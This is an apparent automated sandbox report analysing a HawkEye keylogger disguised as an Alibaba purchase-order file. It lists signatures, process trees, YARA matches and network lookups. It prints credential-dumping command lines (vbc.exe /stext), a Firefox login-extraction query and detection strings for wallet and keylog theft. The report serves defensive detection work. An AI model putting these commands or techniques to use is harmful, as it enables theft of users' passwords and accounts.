Analysis Report PO 2010029_pdf Quotation from Alibaba Ale.exe

Overview

General Information

Sample Name: PO 2010029_pdf Quotation from Alibaba Ale.exe
Analysis ID: 341532
MD5: eb59d99961c7636b4872e389da03cbc9
SHA1: 22d5fb0f076a0d945596b7938e72b6b5cae73674
SHA256: 4dd89aea31cfb64c8fa6b542c9ad002e4041ef5249f2072947df749e00e7fd9e
Tags: exe, Yahoo

Detection

HawkEye, MailPassView
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected HawkEye Rat
Found malware configuration
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected HawkEye Keylogger
Yara detected MailPassView
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
Allocates memory in foreign processes
Changes the view of files in windows explorer (hidden files and folders)
Contains functionality to log keystrokes (.Net Source)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Installs a global keyboard hook
Machine Learning detection for dropped file
Machine Learning detection for sample
May check the online IP address of the machine
Sample uses process hollowing technique
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file access)
Tries to steal Mail credentials (via file registry)
Writes to foreign memory regions
Yara detected WebBrowserPassView password recovery tool
AV process strings found (often used to terminate AV products)
Antivirus or Machine Learning detection for unpacked file
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Creates processes with suspicious names
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May infect USB drives
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Startup

  • System is w10x64
  • PO 2010029_pdf Quotation from Alibaba Ale.exe (PID: 2148 cmdline: 'C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exe' MD5: EB59D99961C7636B4872E389DA03CBC9)
    • dw20.exe (PID: 4636 cmdline: dw20.exe -x -s 2216 MD5: 8D10DA8A3E11747E51F23C882C22BBC3)
    • vbc.exe (PID: 6084 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt' MD5: C63ED21D5706A527419C9FBD730FFB2E)
    • vbc.exe (PID: 968 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt' MD5: C63ED21D5706A527419C9FBD730FFB2E)
    • WerFault.exe (PID: 6004 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2148 -s 2244 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • WindowsUpdate.exe (PID: 4848 cmdline: 'C:\Users\user\AppData\Roaming\WindowsUpdate.exe' MD5: EB59D99961C7636B4872E389DA03CBC9)
  • WindowsUpdate.exe (PID: 6328 cmdline: 'C:\Users\user\AppData\Roaming\WindowsUpdate.exe' MD5: EB59D99961C7636B4872E389DA03CBC9)
  • cleanup

Malware Configuration

Threatname: HawkEye

{"Modules": ["WebBrowserPassView"], "Version": ""}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000008.00000002.308445225.000000001EE00000.00000004.00000001.sdmp | RAT_HawkEye | Detects HawkEye RAT | Kevin Breen <kevin@techanarchy.net>
  • 0x7b833:$key: HawkEyeKeylogger
  • 0x7dab7:$salt: 099u787978786
  • 0x7be96:$string1: HawkEye_Keylogger
  • 0x7cce9:$string1: HawkEye_Keylogger
  • 0x7da17:$string1: HawkEye_Keylogger
  • 0x7c27f:$string2: holdermail.txt
  • 0x7c29f:$string2: holdermail.txt
  • 0x7c1c1:$string3: wallet.dat
  • 0x7c1d9:$string3: wallet.dat
  • 0x7c1ef:$string3: wallet.dat
  • 0x7d5db:$string4: Keylog Records
  • 0x7d8f3:$string4: Keylog Records
  • 0x7db0f:$string5: do not script -->
  • 0x7b81b:$string6: \pidloc.txt
  • 0x7b8a9:$string7: BSPLIT
  • 0x7b8b9:$string7: BSPLIT
00000008.00000002.308445225.000000001EE00000.00000004.00000001.sdmp | JoeSecurity_MailPassView | Yara detected MailPassView | Joe Security
00000008.00000002.308445225.000000001EE00000.00000004.00000001.sdmp | JoeSecurity_HawkEye | Yara detected HawkEye Keylogger | Joe Security
00000008.00000002.308445225.000000001EE00000.00000004.00000001.sdmp | JoeSecurity_WebBrowserPassView | Yara detected WebBrowserPassView password recovery tool | Joe Security
00000008.00000002.308445225.000000001EE00000.00000004.00000001.sdmp | Hawkeye | detect HawkEye in memory | JPCERT/CC Incident Response Group
  • 0x7beee:$hawkstr1: HawkEye Keylogger
  • 0x7cd2f:$hawkstr1: HawkEye Keylogger
  • 0x7d05e:$hawkstr1: HawkEye Keylogger
  • 0x7d1b9:$hawkstr1: HawkEye Keylogger
  • 0x7d31c:$hawkstr1: HawkEye Keylogger
  • 0x7d5b3:$hawkstr1: HawkEye Keylogger
  • 0x7ba7c:$hawkstr2: Dear HawkEye Customers!
  • 0x7d0b1:$hawkstr2: Dear HawkEye Customers!
  • 0x7d208:$hawkstr2: Dear HawkEye Customers!
  • 0x7d36f:$hawkstr2: Dear HawkEye Customers!
  • 0x7bb9d:$hawkstr3: HawkEye Logger Details:
(91 entries in total; only the first are shown)

Unpacked PEs

Source | Rule | Description | Author | Strings
2.2.vbc.exe.400000.0.unpack | JoeSecurity_MailPassView | Yara detected MailPassView | Joe Security
0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.ad0000.1.unpack | MAL_RANSOM_COVID19_Apr20_1 | Detects ransomware distributed in COVID-19 theme | Florian Roth
  • 0x58eb7:$op2: 60 2E 2E 2E AF 34 34 34 B8 34 34 34 B8 34 34 34
  • 0x5883f:$op3: 1F 07 1A 37 85 05 05 36 83 05 05 36 83 05 05 34
11.2.WindowsUpdate.exe.1c5f0000.3.unpack | RAT_HawkEye | Detects HawkEye RAT | Kevin Breen <kevin@techanarchy.net>
  • 0x8908b:$key: HawkEyeKeylogger
  • 0x8b30f:$salt: 099u787978786
  • 0x896ee:$string1: HawkEye_Keylogger
  • 0x8a541:$string1: HawkEye_Keylogger
  • 0x8b26f:$string1: HawkEye_Keylogger
  • 0x89ad7:$string2: holdermail.txt
  • 0x89af7:$string2: holdermail.txt
  • 0x89a19:$string3: wallet.dat
  • 0x89a31:$string3: wallet.dat
  • 0x89a47:$string3: wallet.dat
  • 0x8ae33:$string4: Keylog Records
  • 0x8b14b:$string4: Keylog Records
  • 0x8b367:$string5: do not script -->
  • 0x89073:$string6: \pidloc.txt
  • 0x89101:$string7: BSPLIT
  • 0x89111:$string7: BSPLIT
11.2.WindowsUpdate.exe.1c5f0000.3.unpack | JoeSecurity_MailPassView | Yara detected MailPassView | Joe Security
11.2.WindowsUpdate.exe.1c5f0000.3.unpack | JoeSecurity_HawkEye | Yara detected HawkEye Keylogger | Joe Security
(110 entries in total; only the first are shown)

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Found malware configuration
Source: vbc.exe.968.3.memstr | Malware Configuration Extractor: HawkEye {"Modules": ["WebBrowserPassView"], "Version": ""}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe | ReversingLabs: Detection: 36%
Multi AV Scanner detection for submitted file
Source: PO 2010029_pdf Quotation from Alibaba Ale.exe | ReversingLabs: Detection: 36%
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe | Joe Sandbox ML: detected
Machine Learning detection for sample
Source: PO 2010029_pdf Quotation from Alibaba Ale.exe | Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 11.2.WindowsUpdate.exe.1ee40000.4.unpack | Avira: Label: TR/Inject.vcoldi
Source: 8.2.WindowsUpdate.exe.1c5f0000.4.unpack | Avira: Label: TR/Inject.vcoldi
Source: 0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.400000.0.unpack | Avira: Label: TR/AD.MExecute.lzrac
Source: 0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.400000.0.unpack | Avira: Label: SPR/Tool.MailPassView.473
Source: 8.2.WindowsUpdate.exe.1ad90000.2.unpack | Avira: Label: TR/AD.MExecute.lzrac
Source: 8.2.WindowsUpdate.exe.1ad90000.2.unpack | Avira: Label: SPR/Tool.MailPassView.473
Source: 11.2.WindowsUpdate.exe.400000.0.unpack | Avira: Label: TR/AD.MExecute.lzrac
Source: 11.2.WindowsUpdate.exe.400000.0.unpack | Avira: Label: SPR/Tool.MailPassView.473
Source: 11.2.WindowsUpdate.exe.1c5f0000.3.unpack | Avira: Label: TR/Inject.vcoldi
Source: 8.2.WindowsUpdate.exe.400000.0.unpack | Avira: Label: TR/AD.MExecute.lzrac
Source: 8.2.WindowsUpdate.exe.400000.0.unpack | Avira: Label: SPR/Tool.MailPassView.473
Source: 0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.1efe0000.6.unpack | Avira: Label: TR/AD.MExecute.lzrac
Source: 0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.1efe0000.6.unpack | Avira: Label: SPR/Tool.MailPassView.473
Source: 0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.1c6f0000.4.unpack | Avira: Label: TR/Inject.vcoldi
Source: 0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.1ef40000.5.unpack | Avira: Label: TR/Inject.vcoldi
Source: 11.2.WindowsUpdate.exe.1eed0000.5.unpack | Avira: Label: TR/AD.MExecute.lzrac
Source: 11.2.WindowsUpdate.exe.1eed0000.5.unpack | Avira: Label: SPR/Tool.MailPassView.473
Source: 8.2.WindowsUpdate.exe.1ee00000.5.unpack | Avira: Label: TR/Inject.vcoldi

Compliance:

Uses 32bit PE files
Source: PO 2010029_pdf Quotation from Alibaba Ale.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Uses new MSVCR Dlls
Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exe | File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll
Contains modern PE file flags such as dynamic base (ASLR) or NX
Source: PO 2010029_pdf Quotation from Alibaba Ale.exe | Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Binary contains paths to debug symbols
Source: Binary string: rsaenh.pdb source: WERD288.tmp.mdmp.6.dr
Source: Binary string: 1:pC:\Windows\mscorlib.pdb source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.321080904.0000000021E7A000.00000004.00000010.sdmp
Source: Binary string: wkernel32.pdb source: WERD288.tmp.mdmp.6.dr
Source: Binary string: bcrypt.pdb source: WERD288.tmp.mdmp.6.dr
Source: Binary string: ws2_32.pdb0up source: WERD288.tmp.mdmp.6.dr
Source: Binary string: ucrtbase.pdb source: WERD288.tmp.mdmp.6.dr
Source: Binary string: System.Configuration.pdbKt0 source: WERD288.tmp.mdmp.6.dr
Source: Binary string: wbemcomn.pdb source: WERD288.tmp.mdmp.6.dr
Source: Binary string: NapiNSP.pdb source: WERD288.tmp.mdmp.6.dr
Source: Binary string: msvcrt.pdb source: WERD288.tmp.mdmp.6.dr
Source: Binary string: wrpcrt4.pdb source: WERD288.tmp.mdmp.6.dr
Source: Binary string: wntdll.pdb source: WERD288.tmp.mdmp.6.dr
Source: Binary string: mscorlib.pdbcorlib.pdbpdblib.pdb2.0.0.0__b77a5c561934e089\mscorlib.pdb source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.321080904.0000000021E7A000.00000004.00000010.sdmp
Source: Binary string: f:\binaries.x86ret\bin\i386\bbt\opt\bin\i386\diasymreader.pdb:p source: WERD288.tmp.mdmp.6.dr
Source: Binary string: powrprof.pdbBuP source: WERD288.tmp.mdmp.6.dr
Source: Binary string: mscoreei.pdbOs source: WERD288.tmp.mdmp.6.dr
Source: Binary string: winnsi.pdb source: WERD288.tmp.mdmp.6.dr
Source: Binary string: mscms.pdbQn source: WERD288.tmp.mdmp.6.dr
Source: Binary string: cryptsp.pdb source: WERD288.tmp.mdmp.6.dr
Source: Binary string: C:\Windows\mscorlib.pdbd source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.312366191.000000001C847000.00000004.00000040.sdmp
Source: Binary string: advapi32.pdb source: WERD288.tmp.mdmp.6.dr
Source: Binary string: wsspicli.pdb source: WERD288.tmp.mdmp.6.dr
Source: Binary string: msi.pdb source: WERD288.tmp.mdmp.6.dr
Source: Binary string: CLBCatQ.pdb source: WERD288.tmp.mdmp.6.dr
Source: Binary string: ntmarta.pdb source: WERD288.tmp.mdmp.6.dr
Source: Binary string: dhcpcsvc.pdbFp@ source: WERD288.tmp.mdmp.6.dr
Source: Binary string: wwin32u.pdbup source: WERD288.tmp.mdmp.6.dr
Source: Binary string: cryptsp.pdb`t0 source: WERD288.tmp.mdmp.6.dr
Source: Binary string: wkernelbase.pdb source: WERD288.tmp.mdmp.6.dr
Source: Binary string: psapi.pdb7u` source: WERD288.tmp.mdmp.6.dr
Source: Binary string: shlwapi.pdb source: WERD288.tmp.mdmp.6.dr
Source: Binary string: version.pdbht source: WERD288.tmp.mdmp.6.dr
Source: Binary string: C:\Users\Jovan\Documents\Visual Studio 2010\Projects\Stealer\CMemoryExecute\CMemoryExecute\obj\Release\CMemoryExecute.pdb source: WindowsUpdate.exe
Source: Binary string: mscorjit.pdbbt source: WERD288.tmp.mdmp.6.dr
Source: Binary string: ODBC32.pdb source: WERD288.tmp.mdmp.6.dr
Source: Binary string: f:\Projects\VS2005\mailpv\Release\mailpv.pdb source: WindowsUpdate.exe
Source: Binary string: dwmapi.pdb source: WERD288.tmp.mdmp.6.dr
Source: Binary string: mscoree.pdb source: WERD288.tmp.mdmp.6.dr
Source: Binary string: Windows.Storage.pdbcw source: WERD288.tmp.mdmp.6.dr
Source: Binary string: ws2_32.pdb source: WERD288.tmp.mdmp.6.dr
Source: Binary string: mscorlib.pdbDr source: WERD288.tmp.mdmp.6.dr
Source: Binary string: msasn1.pdb8u source: WERD288.tmp.mdmp.6.dr
Source: Binary string: f:\binaries.x86ret\bin\i386\bbt\opt\bin\i386\diasymreader.pdb source: WERD288.tmp.mdmp.6.dr
Source: Binary string: iphlpapi.pdb source: WERD288.tmp.mdmp.6.dr
Source: Binary string: nsi.pdb source: WERD288.tmp.mdmp.6.dr
Source: Binary string: mscorlib.pdb6 source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.312366191.000000001C847000.00000004.00000040.sdmp
Source: Binary string: rasman.pdb2o source: WERD288.tmp.mdmp.6.dr
Source: Binary string: powrprof.pdb source: WERD288.tmp.mdmp.6.dr
Source: Binary string: System.Configuration.pdb source: WERD288.tmp.mdmp.6.dr
Source: Binary string: ole32.pdb source: WERD288.tmp.mdmp.6.dr
Source: Binary string: rlib.pdb source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.312366191.000000001C847000.00000004.00000040.sdmp
Source: Binary string: msasn1.pdb source: WERD288.tmp.mdmp.6.dr
Source: Binary string: mscorlib.pdb source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.321080904.0000000021E7A000.00000004.00000010.sdmp, WERD288.tmp.mdmp.6.dr
Source: Binary string: DWrite.pdb source: WERD288.tmp.mdmp.6.dr
Source: Binary string: cfgmgr32.pdb source: WERD288.tmp.mdmp.6.dr
Source: Binary string: System.Drawing.pdb source: WERD288.tmp.mdmp.6.dr
Source: Binary string: System.Management.pdb source: WERD288.tmp.mdmp.6.dr
Source: Binary string: combase.pdb source: WERD288.tmp.mdmp.6.dr
Source: Binary string: Windows.Storage.pdb source: WERD288.tmp.mdmp.6.dr
Source: Binary string: dhcpcsvc6.pdb]s0 source: WERD288.tmp.mdmp.6.dr
Source: Binary string: indows\mscorlib.pdbpdblib.pdb source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.312366191.000000001C847000.00000004.00000040.sdmp
Source: Binary string: dpapi.pdb source: WERD288.tmp.mdmp.6.dr
Source: Binary string: apphelp.pdb source: WERD288.tmp.mdmp.6.dr
Source: Binary string: rasadhlp.pdb source: WERD288.tmp.mdmp.6.dr
Source: Binary string: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdb source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.312366191.000000001C847000.00000004.00000040.sdmp
Source: Binary string: dhcpcsvc.pdb source: WERD288.tmp.mdmp.6.dr
Source: Binary string: dwmapi.pdbHt0 source: WERD288.tmp.mdmp.6.dr
Source: Binary string: pnrpnsp.pdb source: WERD288.tmp.mdmp.6.dr
Source: Binary string: cryptbase.pdbjt source: WERD288.tmp.mdmp.6.dr
Source: Binary string: ColorAdapterClient.pdb source: WERD288.tmp.mdmp.6.dr
Source: Binary string: wsspicli.pdbkt source: WERD288.tmp.mdmp.6.dr
Source: Binary string: shcore.pdb source: WERD288.tmp.mdmp.6.dr
Source: Binary string: C:\Windows\dll\mscorlib.pdb source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.312366191.000000001C847000.00000004.00000040.sdmp
Source: Binary string: wgdi32.pdb source: WERD288.tmp.mdmp.6.dr
Source: Binary string: fltLib.pdb source: WERD288.tmp.mdmp.6.dr
Source: Binary string: shell32.pdb source: WERD288.tmp.mdmp.6.dr
Source: Binary string: msvcr80.i386.pdb source: WERD288.tmp.mdmp.6.dr
Source: Binary string: msvcp_win.pdb source: WERD288.tmp.mdmp.6.dr
Source: Binary string: dpapi.pdbxs source: WERD288.tmp.mdmp.6.dr
Source: Binary string: shfolder.pdbit`F source: WERD288.tmp.mdmp.6.dr
Source: Binary string: dnsapi.pdb source: WERD288.tmp.mdmp.6.dr
Source: Binary string: rasapi32.pdb source: WERD288.tmp.mdmp.6.dr
Source: Binary string: System.Runtime.Remoting.pdb*p source: WERD288.tmp.mdmp.6.dr
Source: Binary string: userenv.pdb source: WERD288.tmp.mdmp.6.dr
Source: Binary string: wimm32.pdb source: WERD288.tmp.mdmp.6.dr
Source: Binary string: wwin32u.pdb source: WERD288.tmp.mdmp.6.dr
Source: Binary string: nlaapi.pdb source: WERD288.tmp.mdmp.6.dr
Source: Binary string: userenv.pdbqs source: WERD288.tmp.mdmp.6.dr
Source: Binary string: winnsi.pdbds source: WERD288.tmp.mdmp.6.dr
Source: Binary string: winhttp.pdb source: WERD288.tmp.mdmp.6.dr
Source: Binary string: wUxTheme.pdb source: WERD288.tmp.mdmp.6.dr
Source: Binary string: DDsymbols\dll\mscorlib.pdb source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.321080904.0000000021E7A000.00000004.00000010.sdmp
Source: Binary string: wmiutils.pdb source: WERD288.tmp.mdmp.6.dr
Source: Binary string: gdiplus.pdb source: WERD288.tmp.mdmp.6.dr
Source: Binary string: mscorlib.pdbH source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.321080904.0000000021E7A000.00000004.00000010.sdmp
Source: Binary string: rtutils.pdb source: WERD288.tmp.mdmp.6.dr
Source: Binary string: mscorwks.pdb source: WERD288.tmp.mdmp.6.dr
Source: Binary string: profapi.pdb source: WERD288.tmp.mdmp.6.dr
Source: Binary string: dhcpcsvc6.pdb source: WERD288.tmp.mdmp.6.dr
Source: Binary string: Kernel.Appcore.pdbGu source: WERD288.tmp.mdmp.6.dr
Source: Binary string: f:\binaries.x86ret\bin\i386\Microsoft.VisualBasic.pdb source: WERD288.tmp.mdmp.6.dr
Source: Binary string: wgdi32full.pdb source: WERD288.tmp.mdmp.6.dr
Source: Binary string: mscorjit.pdb source: WERD288.tmp.mdmp.6.dr
Source: Binary string: sechost.pdb source: WERD288.tmp.mdmp.6.dr
Source: Binary string: winhttp.pdb p source: WERD288.tmp.mdmp.6.dr
Source: Binary string: mscoree.pdbWsP source: WERD288.tmp.mdmp.6.dr
Source: Binary string: shfolder.pdb source: WERD288.tmp.mdmp.6.dr
Source: Binary string: wgdi32full.pdbmt@ source: WERD288.tmp.mdmp.6.dr
Source: Binary string: rasman.pdb source: WERD288.tmp.mdmp.6.dr
Source: Binary string: fastprox.pdb source: WERD288.tmp.mdmp.6.dr
Source: Binary string: wbemsvc.pdb source: WERD288.tmp.mdmp.6.dr
Source: Binary string: winrnr.pdb source: WERD288.tmp.mdmp.6.dr
Source: Binary string: System.Drawing.pdb@ source: WERD288.tmp.mdmp.6.dr
Source: Binary string: msctf.pdb source: WERD288.tmp.mdmp.6.dr
Source: Binary string: f:\Projects\VS2005\WebBrowserPassView\Release\WebBrowserPassView.pdb source: WindowsUpdate.exe
Source: Binary string: System.Runtime.Remoting.pdb source: WERD288.tmp.mdmp.6.dr
Source: Binary string: wmswsock.pdb source: WERD288.tmp.mdmp.6.dr
Source: Binary string: version.pdb source: WERD288.tmp.mdmp.6.dr
Source: Binary string: rsaenh.pdb]t source: WERD288.tmp.mdmp.6.dr
Source: Binary string: System.Xml.pdb source: WERD288.tmp.mdmp.6.dr
Source: Binary string: System.pdb source: WERD288.tmp.mdmp.6.dr
Source: Binary string: mscms.pdb source: WERD288.tmp.mdmp.6.dr
Source: Binary string: mscorrc.pdb source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.304520747.000000001B140000.00000002.00000001.sdmp
Source: Binary string: System.Windows.Forms.pdb source: WERD288.tmp.mdmp.6.dr
Source: Binary string: Kernel.Appcore.pdb source: WERD288.tmp.mdmp.6.dr
Source: Binary string: WMINet_Utils.pdb source: WERD288.tmp.mdmp.6.dr
Source: Binary string: psapi.pdb source: WERD288.tmp.mdmp.6.dr
Source: Binary string: fwpuclnt.pdb source: WERD288.tmp.mdmp.6.dr
Source: Binary string: bcrypt.pdb[t source: WERD288.tmp.mdmp.6.dr
Source: Binary string: cryptbase.pdb source: WERD288.tmp.mdmp.6.dr
Source: Binary string: wuser32.pdb@w source: WERD288.tmp.mdmp.6.dr
Source: Binary string: bcryptprimitives.pdb source: WERD288.tmp.mdmp.6.dr
Source: Binary string: mscoreei.pdb source: WERD288.tmp.mdmp.6.dr
Source: Binary string: nlaapi.pdb5o0 source: WERD288.tmp.mdmp.6.dr
Source: Binary string: C:\Windows\assembly\GA.pdbmscorlib\2.0.0.0__b77a5c561934e089\mscorlib.dll source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.321080904.0000000021E7A000.00000004.00000010.sdmp
Source: Binary string: msvcp_win.pdb[w source: WERD288.tmp.mdmp.6.dr
Source: Binary string: oleaut32.pdb source: WERD288.tmp.mdmp.6.dr
Source: Binary string: wuser32.pdb source: WERD288.tmp.mdmp.6.dr
Source: Binary string: wbemprox.pdb source: WERD288.tmp.mdmp.6.dr
Source: Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.312366191.000000001C847000.00000004.00000040.sdmp
Source: Binary string: crypt32.pdb source: WERD288.tmp.mdmp.6.dr
Source: PO 2010029_pdf Quotation from Alibaba Ale.exe | Binary or memory string: autorun.inf
Source: PO 2010029_pdf Quotation from Alibaba Ale.exe | Binary or memory string: [autorun]
Source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.313417162.000000001CCF1000.00000004.00000001.sdmp | Binary or memory string: [autorun]
Source: WindowsUpdate.exe | Binary or memory string: autorun.inf
Source: WindowsUpdate.exe | Binary or memory string: [autorun]
Source: WindowsUpdate.exe | Binary or memory string: autorun.inf
Source: WindowsUpdate.exe | Binary or memory string: [autorun]

Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exe | Code function: 0_2_00404A29 FindFirstFileExW, 0_2_00404A29
Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exe | Code function: 0_2_00B018BD FindFirstFileExA, 0_2_00B018BD
Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exe | Code function: 0_2_00B01BA6 FindFirstFileExW,FindClose,FindNextFileW, 0_2_00B01BA6
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 2_2_00406EC3 FindFirstFileA,FindNextFileA,strlen,strlen, 2_2_00406EC3
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 3_2_00408441 FindFirstFileW,FindNextFileW,wcslen,wcslen, 3_2_00408441
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 3_2_00407E0E FindFirstFileW,FindNextFileW,FindClose, 3_2_00407E0E
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe | Code function: 8_2_00404A29 FindFirstFileExW, 8_2_00404A29
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe | Code function: 8_2_00F018BD FindFirstFileExA, 8_2_00F018BD
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe | Code function: 8_2_00F01BA6 FindFirstFileExW,FindClose,FindNextFileW, 8_2_00F01BA6
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe | Code function: 8_2_00F01D5C FindFirstFileExW, 8_2_00F01D5C
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe | Code function: 8_2_00F01D31 FindFirstFileExA, 8_2_00F01D31
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe | Code function: 11_2_00404A29 FindFirstFileExW, 11_2_00404A29
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe | Code function: 11_2_00F018BD FindFirstFileExA, 11_2_00F018BD
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe | Code function: 11_2_00F01BA6 FindFirstFileExW,FindClose,FindNextFileW, 11_2_00F01BA6
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe | Code function: 11_2_00F01D5C FindFirstFileExW, 11_2_00F01D5C
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe | Code function: 11_2_00F01D31 FindFirstFileExA, 11_2_00F01D31

Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe | Code function: 4x nop then lea esp, dword ptr [ebp-0Ch] 8_2_1AE40728
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe | Code function: 4x nop then lea esp, dword ptr [ebp-0Ch] 11_2_1C940728

Networking:

May check the online IP address of the machine
Source: unknown | DNS query: name: whatismyipaddress.com
Source: unknown | DNS query: name: whatismyipaddress.com
Source: unknown | DNS query: name: whatismyipaddress.com
Source: unknown | DNS query: name: whatismyipaddress.com
Source: unknown | DNS query: name: whatismyipaddress.com
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1, Host: whatismyipaddress.com, Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 104.16.155.36 104.16.155.36
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1, Host: whatismyipaddress.com, Connection: Keep-Alive
Source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.316835361.000000001DCF1000.00000004.00000001.sdmp, vbc.exe, 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, WindowsUpdate.exe, 00000008.00000002.308445225.000000001EE00000.00000004.00000001.sdmp, WindowsUpdate.exe, 0000000B.00000002.312787394.000000001EE40000.00000004.00000001.sdmp | String found in binary or memory: @nss3.dllSOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\seamonkey.exe%programfiles%\Sea MonkeySOFTWARE\Mozillamozilla%s\binPathToExe%programfiles%\Mozilla FirefoxSELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins.---signons.txtsignons2.txtsignons3.txtsignons.sqlitenetmsg.dllUnknown Error\Error %d: %seditkernel32.dll... open %2.2X %s (%s)Microsoft_WinInetMicrosoft_WinInet_u7@dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.datSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
